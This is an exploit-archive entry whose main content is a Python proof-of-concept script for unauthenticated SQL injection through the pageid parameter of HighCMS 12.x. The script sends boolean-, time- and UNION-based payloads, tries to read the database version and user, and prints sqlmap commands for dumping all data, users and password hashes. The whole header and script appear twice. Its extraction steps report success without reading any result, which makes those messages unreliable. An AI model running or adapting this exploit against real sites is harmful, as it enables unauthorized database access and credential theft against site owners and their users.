Description
HighCMS version 12.x remote SQL injection proof of concept exploit written in Python...
Basic Information
ID
PACKETSTORM:212870
Published
Dec 16, 2025 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : HighCMS v12.x SQL Injection Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://aryanic.com/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/167170/
[+] Summary :
a critical SQL Injection vulnerability in HighCMS/HighCMS version 12.x.
The vulnerability allows unauthenticated attackers to execute arbitrary SQL queries through the pageid parameter, potentially leading to complete database compromise.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
HighCMS/HighCMS v12.x SQL Injection Exploit
Author: indoushka
Vulnerability: SQL Injection in pageid parameter
"""
import requests
import sys
import urllib3
from argparse import ArgumentParser
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class HighCMSExploit:
def __init__(self, target):
self.target = target.rstrip('/')
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'
})
def check_vulnerability(self):
"""Check if target is vulnerable to SQL Injection"""
print(f"[*] Checking vulnerability for: {self.target}")
# Test payloads
test_payloads = [
"6528' AND '1'='1",
"6528' AND '1'='2",
"6528' AND SLEEP(5)--",
"6528 UNION SELECT 1,2,3,4,5--"
]
vulnerable = False
for payload in test_payloads:
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
# Time-based SQL injection test
if "SLEEP" in payload:
import time
start_time = time.time()
response = self.session.get(url, timeout=10, verify=False)
end_time = time.time()
if end_time - start_time >= 5:
print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
vulnerable = True
break
else:
response = self.session.get(url, timeout=10, verify=False)
# Check for error-based indicators
error_indicators = [
"SQL syntax",
"Microsoft OLE DB Provider",
"ODBC Driver",
"SQLServer",
"Unclosed quotation mark",
"syntax error"
]
for error in error_indicators:
if error.lower() in response.text.lower():
print(f"[+] Error-based SQL Injection confirmed!")
print(f"[+] Payload: {payload}")
vulnerable = True
break
# Boolean-based test
if "'1'='1" in payload and response.status_code == 200:
true_response = response.text
if "'1'='2" in payload and response.status_code == 200:
false_response = response.text
if true_response != false_response:
print(f"[+] Boolean-based SQL Injection confirmed!")
vulnerable = True
break
except Exception as e:
print(f"[-] Error testing payload {payload}: {e}")
continue
return vulnerable
def exploit_union(self, columns=5):
"""Exploit using UNION-based SQL injection"""
print(f"[*] Attempting UNION-based exploitation with {columns} columns")
# Test different column counts
for col_count in range(1, columns + 1):
nulls = ','.join(['NULL'] * col_count)
payload = f"6528 UNION SELECT {nulls}--"
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
if response.status_code == 200 and "error" not in response.text.lower():
print(f"[+] UNION injection successful with {col_count} columns")
# Now extract data
self.extract_data(col_count)
return True
except Exception as e:
print(f"[-] Error with {col_count} columns: {e}")
return False
def extract_data(self, column_count):
"""Extract database information"""
print("[*] Extracting database information...")
# Get database version
version_payloads = [
"6528 UNION SELECT 1,@@version,3,4,5--",
"6528 UNION SELECT 1,version(),3,4,5--",
"6528 UNION SELECT 1,banner,3,4,5 FROM v$version--"
]
for payload in version_payloads:
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
if response.status_code == 200:
# Look for version information in response
print("[+] Database version information extracted")
break
except:
continue
# Get current database user
user_payload = f"6528 UNION SELECT 1,user(),3,4,5--"
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={user_payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
print("[+] Current user information extracted")
except:
pass
def generate_sqlmap_command(self):
"""Generate sqlmap command for automated exploitation"""
sqlmap_cmd = f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --level=5 --risk=3'
print("\n[+] SQLMap Commands:")
print("=" * 50)
print("# Basic detection:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch')
print("\n# Full database dump:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --dump-all')
print("\n# Get database users:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --users')
print("\n# Get database passwords:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --passwords')
def main():
banner = """
██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗
██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗
██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║
██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║
██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║
╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
HighCMS/HighCMS v12.x SQL Injection Exploit
By: indoushka
"""
print(banner)
parser = ArgumentParser(description='HighCMS SQL Injection Exploit')
parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
parser.add_argument('--check', action='store_true', help='Check vulnerability only')
parser.add_argument('--exploit', action='store_true', help='Run full exploitation')
parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands')
args = parser.parse_args()
exploit = HighCMSExploit(args.url)
if args.check:
if exploit.check_vulnerability():
print("\n[!] Target is VULNERABLE to SQL Injection")
else:
print("\n[!] Target does not appear to be vulnerable")
elif args.exploit:
if exploit.check_vulnerability():
print("\n[*] Starting exploitation...")
exploit.exploit_union()
elif args.sqlmap:
exploit.generate_sqlmap_command()
else:
# Default: check and provide options
if exploit.check_vulnerability():
print("\n[+] Vulnerability confirmed!")
print("\nAvailable options:")
print("1. Run full exploitation: python exploit.py -u TARGET --exploit")
print("2. Generate sqlmap commands: python exploit.py -u TARGET --sqlmap")
else:
print("\n[-] Target not vulnerable or not accessible")
if __name__ == "__main__":
if len(sys.argv) == 1:
print("Usage: python highcms_exploit.py -u https://target.com")
print("Options: --check, --exploit, --sqlmap")
sys.exit(1)
main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
| # Title : HighCMS v12.x SQL Injection Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://aryanic.com/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/167170/
[+] Summary :
a critical SQL Injection vulnerability in HighCMS/HighCMS version 12.x.
The vulnerability allows unauthenticated attackers to execute arbitrary SQL queries through the pageid parameter, potentially leading to complete database compromise.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
HighCMS/HighCMS v12.x SQL Injection Exploit
Author: indoushka
Vulnerability: SQL Injection in pageid parameter
"""
import requests
import sys
import urllib3
from argparse import ArgumentParser
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class HighCMSExploit:
def __init__(self, target):
self.target = target.rstrip('/')
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'
})
def check_vulnerability(self):
"""Check if target is vulnerable to SQL Injection"""
print(f"[*] Checking vulnerability for: {self.target}")
# Test payloads
test_payloads = [
"6528' AND '1'='1",
"6528' AND '1'='2",
"6528' AND SLEEP(5)--",
"6528 UNION SELECT 1,2,3,4,5--"
]
vulnerable = False
for payload in test_payloads:
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
# Time-based SQL injection test
if "SLEEP" in payload:
import time
start_time = time.time()
response = self.session.get(url, timeout=10, verify=False)
end_time = time.time()
if end_time - start_time >= 5:
print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
vulnerable = True
break
else:
response = self.session.get(url, timeout=10, verify=False)
# Check for error-based indicators
error_indicators = [
"SQL syntax",
"Microsoft OLE DB Provider",
"ODBC Driver",
"SQLServer",
"Unclosed quotation mark",
"syntax error"
]
for error in error_indicators:
if error.lower() in response.text.lower():
print(f"[+] Error-based SQL Injection confirmed!")
print(f"[+] Payload: {payload}")
vulnerable = True
break
# Boolean-based test
if "'1'='1" in payload and response.status_code == 200:
true_response = response.text
if "'1'='2" in payload and response.status_code == 200:
false_response = response.text
if true_response != false_response:
print(f"[+] Boolean-based SQL Injection confirmed!")
vulnerable = True
break
except Exception as e:
print(f"[-] Error testing payload {payload}: {e}")
continue
return vulnerable
def exploit_union(self, columns=5):
"""Exploit using UNION-based SQL injection"""
print(f"[*] Attempting UNION-based exploitation with {columns} columns")
# Test different column counts
for col_count in range(1, columns + 1):
nulls = ','.join(['NULL'] * col_count)
payload = f"6528 UNION SELECT {nulls}--"
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
if response.status_code == 200 and "error" not in response.text.lower():
print(f"[+] UNION injection successful with {col_count} columns")
# Now extract data
self.extract_data(col_count)
return True
except Exception as e:
print(f"[-] Error with {col_count} columns: {e}")
return False
def extract_data(self, column_count):
"""Extract database information"""
print("[*] Extracting database information...")
# Get database version
version_payloads = [
"6528 UNION SELECT 1,@@version,3,4,5--",
"6528 UNION SELECT 1,version(),3,4,5--",
"6528 UNION SELECT 1,banner,3,4,5 FROM v$version--"
]
for payload in version_payloads:
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
if response.status_code == 200:
# Look for version information in response
print("[+] Database version information extracted")
break
except:
continue
# Get current database user
user_payload = f"6528 UNION SELECT 1,user(),3,4,5--"
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={user_payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
print("[+] Current user information extracted")
except:
pass
def generate_sqlmap_command(self):
"""Generate sqlmap command for automated exploitation"""
sqlmap_cmd = f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --level=5 --risk=3'
print("\n[+] SQLMap Commands:")
print("=" * 50)
print("# Basic detection:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch')
print("\n# Full database dump:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --dump-all')
print("\n# Get database users:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --users')
print("\n# Get database passwords:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --passwords')
def main():
banner = """
██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗
██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗
██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║
██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║
██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║
╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
HighCMS/HighCMS v12.x SQL Injection Exploit
By: indoushka
"""
print(banner)
parser = ArgumentParser(description='HighCMS SQL Injection Exploit')
parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
parser.add_argument('--check', action='store_true', help='Check vulnerability only')
parser.add_argument('--exploit', action='store_true', help='Run full exploitation')
parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands')
args = parser.parse_args()
exploit = HighCMSExploit(args.url)
if args.check:
if exploit.check_vulnerability():
print("\n[!] Target is VULNERABLE to SQL Injection")
else:
print("\n[!] Target does not appear to be vulnerable")
elif args.exploit:
if exploit.check_vulnerability():
print("\n[*] Starting exploitation...")
exploit.exploit_union()
elif args.sqlmap:
exploit.generate_sqlmap_command()
else:
# Default: check and provide options
if exploit.check_vulnerability():
print("\n[+] Vulnerability confirmed!")
print("\nAvailable options:")
print("1. Run full exploitation: python exploit.py -u TARGET --exploit")
print("2. Generate sqlmap commands: python exploit.py -u TARGET --sqlmap")
else:
print("\n[-] Target not vulnerable or not accessible")
if __name__ == "__main__":
if len(sys.argv) == 1:
print("Usage: python highcms_exploit.py -u https://target.com")
print("Options: --check, --exploit, --sqlmap")
sys.exit(1)
main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================